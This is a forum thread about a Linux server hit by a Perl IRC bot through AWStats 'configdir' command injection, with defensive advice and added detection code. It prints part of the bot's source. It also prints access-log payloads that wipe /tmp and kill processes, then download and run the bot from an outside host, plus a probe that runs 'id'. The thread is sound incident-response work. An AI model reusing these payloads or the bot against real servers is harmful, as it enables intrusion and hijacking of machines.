# hacked by shellbot [via awstats 6.3-r2][solved]

## newtonian

Hi-

One of my machines was compromised by the shellbot worm.  I don't have phpbb installed but I do have php running with apache2.  I saw that a perl script spawned by apache was eating up all of my CPU.  I tried killing the process; it had been running for 13 hours.  I wasn't able to kill it, so I thought something was strange.  I grepped for "apache" in the temp directory and found this file: sess_3539283e27d73cae29fe2b80f9293f60.  I vimmed the file and found the text shellbot in it.  I googled shellbot and found that it goes after php and phpbb vulnerabilities.  Since I don't have phpbb, I reasoned that php was the problem.

I thought about what I could have done to compromise security.  20 hours ago I changed a setting in /etc/apache2/conf/php.ini.   I changed allow_url_fopen = Off to on 

```
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
; Closed for security - <robbat2@gentoo.org>
#allow_url_fopen = Off
allow_url_fopen = Off
```

7 hours later the worm got in.  : (    

I commented out the worm code and changed the allow_url_fopen to off and rebooted the machine.  Everything seems to be running fine but I know I have to reformat the hard disk and start over again.  I've got a lot of web sites and mail accounts on this machine so it's going to be a major pain in the butt.  But that's the way it goes.  Live and learn.  : (

Below is a snippet of the worm.

```
#hellBOT - FBI TEAM Corporation
##
##  ShellBOT - FBI TEAM Corporation
##
##   0ldW0lf - effbeeye81@aol.com
##           - www.security.cnc.net
##
##
##
################# CONFIGURATION ################################################################
#my $processo = '/usr/local/apache/bin/httpd -DSSL';                   # Process name that will show up in ps        #
##----------------------------------------------################################################
#my $linas_max='8';                             # Avoids flooding :) after X lines             #
##----------------------------------------------################################################
#my $sleep='4';                                 # it sleeps X seconds                          #
###################### IRC #####################################################################
#my @adms=("zamel00","buju");                          # Administrator nicks
##
##----------------------------------------------################################################
#my @canais=("#vvvvv 214112");                         # Channels; if there is a key ("#channel :key")  #
##----------------------------------------------################################################
#my $nick='fbigov';                            # Bot nick. If it is already in use it will     #
#                                               # appear with a random number at the end        #
##----------------------------------------------################################################
#my $ircname = 'fbigov';                     # User ID
##
##----------------------------------------------################################################
#chop (my $realname = `uname -a`);              # Full Name                                    #
##----------------------------------------------################################################
#$servidor='61.77.30.70' unless $servidor;  # IRC server to use                            #
#                                               # if none is given as an argument              #
##----------------------------------------------################################################
#my $porta='6667';                             # IRC server port                              #
################# SHELL ACCESS #################################################################
#my $secv = 1;                                 # 1/0 to enable/disable shell access           #
################################################################################################
#
#my $VERSAO = '0.2';
#
#$SIG{'INT'} = 'IGNORE';
#$SIG{'HUP'} = 'IGNORE';
#$SIG{'TERM'} = 'IGNORE';
#$SIG{'CHLD'} = 'IGNORE';
#$SIG{'PS'} = 'IGNORE';
#
#use IO::Socket;
#use Socket;
#use IO::Select;
#chdir("/");
#$servidor="$ARGV[0]" if $ARGV[0];
#$0="$processo"."\0"x16;;
#my $pid=fork;
#exit if $pid;
#die "Problema com o fork: $!" unless defined($pid);
#
#
#
#my $dcc_sel = new IO::Select->new();
#
##############################
##  B0tchZ in the veins hehe :P  #
##############################
#
#$sel_cliente = IO::Select->new();
#sub sendraw {
#  if ($#_ == '1') {
#    my $socket = $_[0];
#    print $socket "$_[1]\n";
#  } else {
#      print $IRC_cur_socket "$_[0]\n";
#  }
#}
#
#
#sub conectar {
#   my $meunick = $_[0];
#   my $servidor_con = $_[1];
#   my $porta_con = $_[2];
#
#   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
#   if (defined($IRC_socket)) {
#     $IRC_cur_socket = $IRC_socket;
#
#     $IRC_socket->autoflush(1);
#     $sel_cliente->add($IRC_socket);
#
#     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
#     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
#     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
#     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
#     nick("$meunick");
#     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
#     sleep 1;
#   }
#
#}
#my $line_temp;
#while( 1 ) {
#   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
#   delete($irc_servers{''}) if (defined($irc_servers{''}));
#   &DCC::connections;
#   my @ready = $sel_cliente->can_read(0);
#   next unless(@ready);
#   foreach $fh (@ready) {
#     $IRC_cur_socket = $fh;
#     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
#     $nread = sysread($fh, $msg, 4096);
#     if ($nread == 0) {
#        $sel_cliente->remove($fh);
snipped the remaining 90%....
```

If anybody knows exactly what allowed this worm to get through please let me know, so I can guard against it in the future.  I'm guessing that the file write setting I discussed above was the problem but I'm not sure.

Cheers,

Last edited by newtonian on Sun May 25, 2008 4:53 am; edited 3 times in total

----------

## yaneurabeya

Hmmm... what version of php are you using?

----------

## MrUlterior

There is likely another rootkit somewhere on your system, run chkrootkit and/or use portage to check what files have changed.

The shellbot looks like an irc bot, would you be willing to post a url to the full script or email it to me? I'd be interested in having a look at it.

----------

## yaneurabeya

It is an IRC bot (at least from what's shown). Do you have an IRC server or use IRC?

----------

## Prompty

Who writes a bot in Perl?

This script looks pretty non-blackhat.

This looks like something copied from the web. (What language is that, Portuguese?)

I'd like a copy too if you don't mind, and the version of software you're (were) running.

----------

## newtonian

 *yaneurabeya wrote:*   

> Hmmm... what version of php are you using?

 

Here are the apache related programs I have installed and their versions before I got hit:

 *Quote:*   

> 
> 
> emerge search php
> 
> *  dev-php/php
> ...

 

I only have ports 25(smtp), 993(pop3ssl) 995(imapSSL) 443(SSL web) and 80(web) exposed to the internet.

----------

## newtonian

 *MrUlterior wrote:*   

> There is likely another rootkit somewhere on your system, run chkrootkit and/or use portage to check what files have changed.
> 
> 

 

check rootkit seems to have come up ok.  Here's the output:

 *Quote:*   

> 
> 
> hawk tmp # chkrootkit
> 
> ROOTDIR is `/'
> ...

 

----------

## newtonian

 *MrUlterior wrote:*   

>  use portage to check what files have changed.
> 
> 

 

I'd like to.  I searched the forum, man and google for "portage change file hack" but can't figure out how to do it properly.  Could you point me to some documentation or give me a pointer on how to use portage to check files?

----------

## newtonian

 *yaneurabeya wrote:*   

> It is an IRC bot (at least from what's shown). Do you have an IRC server or use IRC?

 

No, I don't have an IRC server or even use IRC clients.

I'm guessing that it was one of the following because I don't expose anything else (other than mail) to the internet:

vpopmail admin

phpmyadmin

awstats

php

Tomcat

I did an emerge world last month and my settings are pretty much out of the box for all of my installs.  

But I still don't know what the cause is.  Spooky. :(

----------

## newtonian

 *Prompty wrote:*   

> who writes a bot in perl ?
> 
> this script looks pretty non-blackhat 
> 
> this looks like something copied from the web. (what language is that portugese ?)
> ...

 

You can get a copy here:

```
www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60
```

and the php version I was/am running:

```
emerge search php
* dev-php/php
Latest version available: 4.3.10
Latest version installed: 4.3.10
```

Last edited by newtonian on Fri Apr 01, 2005 5:11 pm; edited 1 time in total

----------

## rex123

Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false

Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

----------

## MrUlterior

 *rex123 wrote:*   

> Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
> 
> Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

 

His version of awstats is 6.3-r2, according to your URL the problem was corrected in 6.3 - so I would assume that is not the vulnerability unless you know otherwise ...

I'd still like to see a copy of any shellcode used to propagate the shellbot into the session file

EDIT:

Ah, from http://awstats.sourceforge.net/

 *Quote:*   

> Warning, a security hole was recently found in old AWStats versions (from 5.0 to 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody").
> 
> If you use AWStats with a recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes. 
> ...

 

So that was probably it then.

----------

## MrUlterior

 *newtonian wrote:*   

>  *MrUlterior wrote:*    use portage to check what files have changed.
> 
>  
> 
> I'd like to.  I searched the forum, man and google for "portage change file hack"
> ...

 

Hmmm, I was certain portage did this -- I personally use tripwire. However, it seems that qpkg might do this for you with either of the following options:

```
-cm, --check-md5
-mc, --md5-check - Verify package files md5
```

Check the man page @ http://gentoo-wiki.com/MAN_qpkg

emerge qpkg

or

emerge gentoolkit

(don't remember which it is)

to install.

----------

## rex123

Apologies for an old link. I've seen awstats advisories in the past month on bugtraq, and I googled for what looked like a good description of the problem. Thanks for finding the more up to date info.

----------

## newtonian

 *Quote:*   

> 
> 
> Warning, a security hole was recently found in old AWStats versions (from 5.0 to 6.3) when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody").
> 
> If you use AWStats with a recent version or if AWStats is not available as a CGI, you are safe. If not, it is highly recommanded to upgrade to 6.4 version that fix all known security holes. 
> ...

 

 *Quote:*   

> So that was probably it then.

 

I estimated that I got hit at about noon on Mar 31st so I vimmed the apache2 access_log and did a search for perl.    

Here's what I found about an hour before noon.

 *Quote:*   

> 
> 
> 192.168.1.10 - - [31/Mar/2005:10:38:38 +0900] "GET /config/default.css HTTP/1.1" 404 363 "http://hakodatecgi.com/calendar/getMyCalendar.do?id=4&increment=-1&currentMonth=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20050221 Firefox/1.0"
> 
> 211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
> ...

 

The calendar stuff was me debugging a web app for a customer.

----------

## newtonian

 *MrUlterior wrote:*   

> 
> 
> I'd still like to see a copy of any shellcode used to propagate the shellbot into the session file
> 
> 

 

```
211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
```

Putting the above request into a URL decoder gave me:

```
Decoded Results: 211.105.221.84 - - [31/Mar/2005:10:40:21 0900] "GET
/awstats/awstats.pl?configdir=|echo ;
cd /tmp;
rm -rf *;
killall -9 perl;
wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;
perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;
echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
```
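The request newtonian decoded by hand above is easy to pick out of an access log automatically. The following is an added example, not code from the thread or from AWStats: it parses combined-format log lines, pulls the configdir= value out of any awstats.pl request, URL-decodes it, and reports every line where that value contains shell metacharacters, split into the individual commands the attacker chained with `;`. Two of the sample lines are copied from this thread; the third, benign request is constructed as a control.

```python
"""Flag AWStats configdir command-injection attempts in Apache access logs.

Added example, not code from the thread or from AWStats.  SAMPLE_LOG holds
two lines copied from the posts above (the attacker IPs and the fetched file
name are the thread's own) plus one constructed benign request as a control.
"""
import re
from urllib.parse import unquote_plus

# Apache combined log: host ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# A configdir value containing any of these is a command, not a directory.
SHELL_META = re.compile(r'[|;`$&]')

SAMPLE_LOG = [
    # from the thread: the request that dropped the bot
    '211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;perl%20sess_3539283e27d73cae29fe2b80f9293f60;echo%20;echo| HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"',
    # from the thread: a probe that only runs `id` to see whether the host is exploitable
    '210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    # constructed control: a legitimate configdir pointing at a directory
    '192.0.2.10 - - [31/Mar/2005:09:00:00 +0900] "GET /awstats/awstats.pl?config=example.org&configdir=/etc/awstats HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-log line into its fields; None if it is not a log line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_configdir(target):
    """Return the URL-decoded configdir= value of an awstats.pl request, else None.

    The query string is split by hand on '&' only: the payload carries literal
    ';' separators, which older parse_qs versions would also treat as delimiters.
    """
    path, _, query = target.partition('?')
    if not path.lower().endswith('awstats.pl'):
        return None
    for pair in query.split('&'):
        key, _, value = pair.partition('=')
        if key.lower() == 'configdir':
            return unquote_plus(value)
    return None


def analyse(lines):
    """Yield one finding per line whose configdir value contains shell metacharacters."""
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        value = extract_configdir(rec['target'])
        if value is None or not SHELL_META.search(value):
            continue
        # Drop the pipes that turn the value into a Perl open() command and
        # split the chain on ';' to list what the attacker tried to run.
        commands = [c.strip() for c in value.strip('|').split(';') if c.strip()]
        downloads = [c.split()[-1] for c in commands if c.startswith(('wget ', 'curl '))]
        yield {
            'source': rec['host'],
            'time': rec['time'],
            'status': int(rec['status']),
            'commands': commands,
            'downloads': downloads,
        }


if __name__ == '__main__':
    for finding in analyse(SAMPLE_LOG):
        print(f"{finding['time']} {finding['source']} status={finding['status']}")
        for cmd in finding['commands']:
            print('    ' + cmd)
        for url in finding['downloads']:
            print('    fetched: ' + url)
```

Run it against a real log with `analyse(open('/var/log/apache2/access_log'))`. The status code says little on its own: the injected command runs while AWStats is still loading its configuration, before it decides what to respond, so treat any hit as a reason to look in /tmp and the process list, as the thread did.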

----------

## newtonian

 *rex123 wrote:*   

> Awstats is almost certainly the problem. See http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false
> 
> Don't reinstall the world (unless you really want to). Just secure php, and upgrade (or uninstall) awstats.

 

Ok, here's what I've done so far:

```
emerge unmerge awstats
chkrootkit
mv /tmp/sess_3539283e27d73cae29fe2b80f9293f60 ./
chmod 400 sess_3539283e27d73cae29fe2b80f9293f60
vim /etc/apache2/conf/php.ini    # allow_url_fopen = on --> Off
```

What else do you recommend I do to secure php?

Cheers,

----------

## yaneurabeya

It sounds like the issue wasn't just securing php, but updating your programs. Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). I think I remember something in glsa-security about awstats as well as something on Google about it too a couple of weeks ago.

----------

## newtonian

 *yaneurabeya wrote:*   

> It sounds like the issue wasn't just securing php, but updating your programs. Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). I think I remember something in glsa-security about awstats as well as something on Google about it too a couple of weeks ago.

 

Thanks for the tip.  I didn't know about glsa-check so I googled for it.  

http://www.gentoo.org/doc/en/gentoo-security.xml

devotes a couple lines about glsa at the bottom of the page.

I did:

```
glsa-check --list

```

and updated all of the risks on my system.  glsa-check is great.

It's too bad that it doesn't work correctly with the current version of awstats:

 *Quote:*   

> 
> 
>  glsa-check --list | grep awstats
> 
> 200501-36 [U] AWStats: Remote code execution ( net-www/awstats )
> ...

 

glsa-check says that my system is unaffected by the remote code execution hack.  

But if that were true I wouldn't have had somebody's shellbot eating up 98% of my CPU.

I think anybody running (as CGI) the latest version of awstats in portage (awstats 6.3-r2) is vulnerable.  :(

----------

## newtonian

 *yaneurabeya wrote:*   

> Add a glsa-check cronjob to your root crontab to make sure that this junk doesn't happen to you anymore (or at least very VERY rarely). 

 

Thanks again for the advice.

I use vixie cron so I typed crontab -e and added the following lines.

```
15    5      *      *       *              /usr/bin/emerge --sync
55    5      *      *       *              /usr/bin/glsa-check -l | grep -e '\[N\]'
```

With this, cron sends me a daily list of all the files that need updating.

----------

## newtonian

Here's somebody else who got hit with the same thing at about the same time.

https://forums.gentoo.org/viewtopic-t-316275-start-0-postdays-0-postorder-asc-highlight-apache.html

It's got some good advice listed on what do to secure your system as well.

Cheers,

----------

## revertex

 *Prompty wrote:*   

> who writes a bot in perl ?
> 
> this script looks pretty non-blackhat 
> 
> this looks like something copied from the web. (what language is that portugese ?)
> ...

 

Yes, the comments are in Portuguese; it looks like Brazilian Portuguese.

If someone is interested I can translate the comments.

----------

## rex123

 *newtonian wrote:*   

> 
> 
> What else do you recommend I do to secure php?
> 
> 

 

This has been said before on other threads, but here's a summary:

Make sure that a php script - any php script - can't execute anything that you don't mean it to. Mostly this means not allowing php to execute anything in a world-writable directory, eg /tmp or /var/tmp.

There is a lot of information on this on the web, so have a look. Start here: http://www.php.net/manual/en/security.php

----------

## newtonian

Thanks for all the help.

I checked out the PHP site you referred to and it had a lot of good tips.

I think the reason they got into my system was because I was running a vulnerable version of awstats (6.3-r2) AND one of my vhosts did not have stats authentication running.

I tried hacking myself with the code below and I get the login dialog.  So I think this will stop me from being hacked the same way as before.

Will adding authentication stop this kind of attack and make awstats safe to use again?

```
mydomain.com/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;
wget%20www.yahoo.com/sess_testHack;
echo| HTTP/1.1" 200 604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98 )"
```

----------

## rex123

 *newtonian wrote:*   

> 
> 
> Will adding authentication stop this kind of attack and make awstats safe to use again?
> 
> 

 

Authentication will prevent anonymous users from being able to access at all. If they can't access, they can't exploit stuff.

But if you have anything still available to the world without authentication, it could be vulnerable. If it's php code, and it's not something you wrote (eg phpbb, phpnuke, awstats, phpmyadmin, etc etc) then you can be sure there are plenty of people looking for exploits.

So you should do your best in general to make php secure, by turning on safe_mode etc etc, as per all the security info.

----------

## kaidon

 *newtonian wrote:*   

> 
> 
> ```
> 
> 211.105.221.84 - - [31/Mar/2005:10:40:21 +0900] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www \
> ...

 

What I also find a good idea on a server is to mount your /tmp directory like:

```
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

# or, if you're short on RAM, a disk partition (use the partition's real
# filesystem type here, e.g. ext3; tmpfs is only for the RAM-backed variant):
#/dev/hdaX    /tmp    ext3    nodev,nosuid,noexec    0 0
```

which would have prevented the perl script from being executed.

cheers

k

mod edit: inserted \ linebreak for formatting --Earthwings

----------

## newtonian

 *kaidon wrote:*   

> 
> 
> What I also find a good idea on a server is to mount your /tmp directory like:
> 
> ```
> ...

 

Thanks for the advice, I'll add the line above to my /etc/fstab when access slows down and do a reboot.

I'm assuming that adding the above line won't have any effect on qmail, vpopmail, qmail-scanner or apache.

If not I'm sure I'll find out soon enough.

Cheers,

----------

## newtonian

Here's my current fstab:

```
# <fs>                  <mountpoint>    <type>          <opts> <dump/pass>
/dev/sda1               /boot           ext2            noauto,noatime 1 1
/dev/sda3               /               ext3            noatime 0 0
/dev/sda2               none            swap            sw 0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro 0 0
```

I've got partitions for boot, root and swap but nothing for tmp.

Do I need to re-partition my hard disk?  or can I just add something to fstab to get it to work.

 *Quote:*   

> 
> 
> tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
> 
> 

 

Cheers,

----------

## kaidon

If you've got plenty of RAM you can mount your /tmp on a tmpfs filesystem.

In this case you don't need to alter any partition tables.

Depending on what apps you're running it'll also be quite a speed-up.

You may want to set the maximum size used for the tmpfs. It will only use the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up too much RAM.

Personally I like to have multiple partitions on a server.

Here's one of my /etc/fstab's as an example:

```
/dev/hda1     /boot            ext2       noauto,noatime                        1 2
/dev/hda2     none             swap       sw                                    0 0
/dev/hda3     /                reiserfs   noatime,notail                        0 1
/dev/hda5     /var             reiserfs   noatime,notail,nodev,nosuid           0 0
/dev/hda6     /usr             reiserfs   noatime,notail,nodev,ro               0 0
/dev/hda7     /home            reiserfs   noatime,notail,nodev,nosuid           0 0
/dev/hda8     /mnt/build       reiserfs   noauto,noatime,notail,nodev,nosuid    0 0
/dev/hda9     /opt             reiserfs   noatime,notail,nodev,rw               0 0
/dev/hda10    /cvs             reiserfs   noatime,notail,nodev,nosuid           0 0
#
none          /proc            proc       defaults                              0 0
none          /dev/shm         tmpfs      defaults                              0 0
tmpfs         /tmp             tmpfs      nodev,nosuid,noexec                   0 0
# run amavisd-new temp directory on tmpfs
tmpfs         /var/amavis/tmp  tmpfs      defaults,nodev,nosuid,noexec,mode=700,uid=102,gid=2003  0 0
```

A recommended read giving the above tips plus many more is

http://www.gentoo.org/doc/en/gentoo-security.xml

hth

cheers

Steven

----------

## newtonian

 *kaidon wrote:*   

> If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
> 
> In this case you don't need to alter any partition tables.
> 
> Depending on what apps you're running it'll also be quite a speed up.
> ...

 

My server access slowed down so I added the single line you suggested and rebooted:

```
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
```

Now my fstab looks like this:

```
# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>
# NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.
/dev/sda1               /boot           ext2            noauto,noatime          1 1
/dev/sda3               /               ext3            noatime                 0 0
/dev/sda2               none            swap            sw                      0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0
tmpfs                   /tmp            tmpfs           nodev,nosuid,noexec     0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0
```

I tested to see if I could run executables from the tmp directory.

```
hawk tmp # cd /tmp
hawk tmp # cat david.hack
#/bin/sh
echo 'I am runnable'
hawk tmp # ls -l david.hack
-rwxrwxr-x  1 root root 30 Apr 14 02:34 david.hack
hawk tmp # whoami
root
hawk tmp # ./david.hack
-bash: ./david.hack: Permission denied
```

I couldn't  :)

I made sure mail and apache were working ok and everything tested out fine.

I'm all set. Thanks for the useful advice!
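The test above shows noexec doing its job for a direct `./david.hack`, and the two fstab listings in this thread differ only in the /tmp line. The following is an added check, not code from the thread: it parses fstab text and reports which of nodev, nosuid and noexec are missing on the world-writable mounts (/tmp, /var/tmp as mentioned earlier in the thread, and /dev/shm, which both listings mount with `defaults`). The BEFORE and AFTER inputs are the two listings posted above, reproduced as text. One caveat that the `./david.hack` test does not show: noexec only makes the kernel refuse to execve() a file on that mount; an interpreter can still read and run it, and the attacker's command line here was `perl sess_...`, not `./sess_...`, so the mount option raises the bar without closing the hole.

```python
"""Audit fstab entries for the hardening options the thread settles on for /tmp.

Added example, not from the thread.  BEFORE and AFTER are the two fstab
listings posted above, reproduced as text; the check also covers /var/tmp
(mentioned earlier in the thread) and /dev/shm, which both listings mount with
'defaults'.

Caveat: noexec makes the kernel refuse to execve() a file on that mount
('./david.hack: Permission denied'), but it does not stop an interpreter
from reading the file ('perl /tmp/sess_...' or 'sh /tmp/x' still run).
"""

REQUIRED = {
    '/tmp': {'nodev', 'nosuid', 'noexec'},
    '/var/tmp': {'nodev', 'nosuid', 'noexec'},
    '/dev/shm': {'nodev', 'nosuid', 'noexec'},
}

# newtonian's fstab before the change (no /tmp entry at all)
BEFORE = """\
# <fs>                  <mountpoint>    <type>          <opts> <dump/pass>
/dev/sda1               /boot           ext2            noauto,noatime 1 1
/dev/sda3               /               ext3            noatime 0 0
/dev/sda2               none            swap            sw 0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro 0 0
"""

# the same file after the tmpfs line was added
AFTER = BEFORE + """\
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0
"""


def parse_fstab(text):
    """Return [(device, mountpoint, fstype, set(options))] for each real entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line; mount would reject it as well
        device, mountpoint, fstype, opts = fields[:4]
        entries.append((device, mountpoint, fstype, set(opts.split(','))))
    return entries


def audit(text, required=REQUIRED):
    """Map each required mountpoint to the options it lacks.

    A mountpoint with no entry of its own is reported as lacking everything:
    a plain /tmp directory simply inherits the root filesystem's options.
    """
    options_by_mount = {mp: opts for _, mp, _, opts in parse_fstab(text)}
    report = {}
    for mountpoint, wanted in required.items():
        missing = wanted - options_by_mount.get(mountpoint, set())
        if missing:
            report[mountpoint] = missing
    return report


if __name__ == '__main__':
    for label, text in (('before', BEFORE), ('after', AFTER)):
        print(label, audit(text) or 'all required options present')
```

The same function can be pointed at the live system with `audit(open('/proc/mounts').read())`, which reports what is actually mounted rather than what fstab promises.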

----------

## Koon

awstats 6.3-r2 includes 6.4-based patches that fix the configdir problem :

```
if ($QueryString =~ /configdir=([^&]+)/i)
   { $DirConfig=&Sanitize(&DecodeEncodedString("$1")); }
```

with:

```
sub Sanitize {
        my $stringtoclean=shift;
        my $full=shift||0;
        if ($full) {
                $stringtoclean =~ s/[^\w]//g;
        } else {
                $stringtoclean =~ s/[^\w\-\\\/\.:\s]//g;
        }
        return $stringtoclean;
}
```

So the "|echo ;cd /tmp;wget www.hacker.com/badscript;echo ;echo|" would get stripped of the | and ; and therefore be harmless.

My guess is that the awstats.pl in your cgi-bin wasn't an updated version. Awstats is a webapp-config enabled package, so it requires you to deploy it after installation on your virtual hosts (using webapp-config). If you don't, you may have lying around an old vulnerable awstats.pl in cgi-bin...

-K
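To see concretely what the quoted Sanitize() does to the payload from the access log, here is a Python port of that subroutine. It is added here and is not AWStats' own code: the two regexes are transcribed from the Perl above, and the site name used to build the config file name is an assumption. It also models the Perl two-argument open() rule that made the unsanitised value dangerous, so the unpatched and patched results can be compared side by side.

```python
"""Python port of the AWStats 6.4 Sanitize() quoted above, as an added example
(not AWStats' code; the two regexes are transcribed from the Perl in the post).

The vulnerable versions built "$DirConfig/awstats.$SiteConfig.conf" from the
raw configdir= value and handed it to Perl's two-argument open(), which treats
a leading '|' as "run this command and write to it".  is_perl_open_pipe()
models that rule so the before/after can be compared.
"""
import re

# Perl: s/[^\w\-\\\/\.:\s]//g  -- keep word chars, '-', '\', '/', '.', ':' and whitespace
_PARTIAL = re.compile(r'[^\w\-\\/.:\s]')
# Perl: s/[^\w]//g             -- keep word chars only (the $full=1 mode)
_FULL = re.compile(r'[^\w]')

# The decoded payload from the access log in the thread.
PAYLOAD = ('|echo ;cd /tmp;rm -rf *;killall -9 perl;'
           'wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60;'
           'perl sess_3539283e27d73cae29fe2b80f9293f60;echo ;echo|')


def sanitize(value, full=False):
    """Mirror of Sanitize($string, $full): delete every character outside the allow-list."""
    return (_FULL if full else _PARTIAL).sub('', value)


def is_perl_open_pipe(filename):
    """True if Perl's 2-arg open(FH, $filename) would spawn a shell command.

    Two-argument open interprets a leading '|' as a pipe to a command and a
    trailing '|' as a pipe from one (after trimming surrounding whitespace).
    """
    s = filename.strip()
    return s.startswith('|') or s.endswith('|')


def config_path(configdir, site='example.org'):
    """The file name AWStats builds from configdir (the site name is an assumption)."""
    return f'{configdir}/awstats.{site}.conf'


def compare(payload=PAYLOAD):
    """Show what open() would see before and after the Sanitize() patch."""
    unpatched = config_path(payload)
    patched = config_path(sanitize(payload))
    return {
        'unpatched_path': unpatched,
        'unpatched_spawns_shell': is_perl_open_pipe(unpatched),
        'patched_path': patched,
        'patched_spawns_shell': is_perl_open_pipe(patched),
    }


if __name__ == '__main__':
    for key, val in compare().items():
        print(f'{key}: {val}')
```

Note that the default (non-full) mode keeps `.`, `/` and `\`: it removes the `|`, `;` and `*` that turned configdir into a command, but it still lets configdir name any directory the web server user can read, which is one more reason to keep the HTTP authentication the thread settles on in front of awstats.pl.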

----------

## linux_girl

Holy crap, me too:

```

zcat /var/log/apache2/access_log.1.gz |grep awstats.pl|grep configdir

 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET

//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389 "-"

"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:45 +0200] "GET

//cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 389  

 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET

//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:47 +0200] "GET

//cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 381  

 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET

//cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 302 377 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows 98)"  

 MY-IP 210.114.146.150 - - [13/Sep/2005:09:43:48 +0200] "GET

